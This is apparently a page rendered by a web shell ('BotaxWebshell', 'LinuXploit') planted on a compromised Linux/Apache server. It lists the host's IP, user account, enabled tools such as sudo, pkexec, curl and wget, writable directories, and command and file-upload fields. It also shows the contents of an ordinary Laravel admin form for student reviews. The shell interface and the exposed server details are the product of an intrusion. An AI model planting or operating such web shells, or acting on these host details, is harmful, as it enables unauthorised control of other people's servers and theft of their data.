BotaxWebshell
Server IP : 68.178.172.28  /  Your IP : 216.73.216.26
Web Server : Apache
System : Linux 28.172.178.68.host.secureserver.net 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : kiskarnal ( 1003)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/kiskarnal/public_html/storage/framework/views/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/kiskarnal/public_html/storage/framework/views/c8172517638418b85bf924f2929ec15009dfff8d.php
<?php echo $__env->make('admin.includes.header', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>;
<body>
    
    <main id="main" class="main">

    <div class="pagetitle">
        <h1>Add SIP Review</h1>
        <nav>
            <ol class="breadcrumb">
                <li class="breadcrumb-item"><a href="<?php echo e(url('/')); ?>">Dashboard</a></li>
                <li class="breadcrumb-item active">SIP Review</li>
            </ol>
        </nav>
    </div><!-- End Page Title -->

     <section class="section">

          <div class="card">
            <div class="card-body">
              <!-- General Form Elements -->
           <form action="<?php echo e(url('admin/save-review')); ?>" method="post" enctype="multipart/form-data">
               <?php echo csrf_field(); ?>
               <input type="hidden" name="edit_id" value="<?php echo e(isset($row) ? $row->id : ''); ?>">
                <div class="row justify-content-center">
                    <div class="col-lg-8 col-xs-12 col-sm-12">
                        <div class="form-group my-4">
                            <label>Student Name</label>
                            <input type="text" class="form-control" value="<?php echo e(isset($row) ? $row->name : ''); ?>" name="name" placeholder="Student Name">
                        </div>
                    </div>
                    <div class="col-lg-8 col-xs-12 col-sm-12">
                        <div class="form-group mb-4">
                            <label>Class</label>
                            <input type="text" class="form-control" value="<?php echo e(isset($row) ? $row->class : ''); ?>" name="class" placeholder="e.g 9th, 10th, 11th, 12th">
                        </div>
                    </div>
                    
                    <div class="col-lg-8 col-xs-12 col-sm-12">
                        <div class="form-group mb-4">
                            <label>Short Description</label>
                            <input type="text" class="form-control" value="<?php echo e(isset($row) ? $row->description : ''); ?>" name="description" placeholder="Short Description">
                        </div>
                    </div>

                    <div class="col-lg-8 col-xs-12 col-sm-12">
                        <div class="form-group mb-4">
                            <label>Add Profile Image</label>
                            <input type="file" class="form-control" name="image" >
                        </div>
                        <?php if(isset($row)): ?>
                        <img src="<?php echo e(asset('images/'.$row->image)); ?>" style="height:100px;width:100px;">
                        <?php endif; ?>
                    </div>

                </div>
               
                <div class="row mb-4">
                    <div class="col-lg-12 col-xs-12 col-sm-12">
                        <label for="inputText" class="col-sm-2 col-form-label"></label>
                        <div class="text-container">
                            <label>Review Text</label>
                           <textarea class="form-control" name="review" col="" rows="5"><?php echo e(isset($row) ? $row->review : ''); ?></textarea>
                        </div>
                    </div> 
                </div>
                
                <div class="row mb-3">
                    <div class="col-sm-12 text-end">
                        <button type="submit" class="btn btn-primary">Save & Add</button>
                     </div>
                </div>

              </form><!-- End General Form Elements -->

            </div>
          </div>

    </section>
  </main><!-- End #main -->
    
</body>

<?php echo $__env->make('admin.includes.footer', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>;

<?php /**PATH /home/kiskarnal/public_html/resources/views/admin/sip_review.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit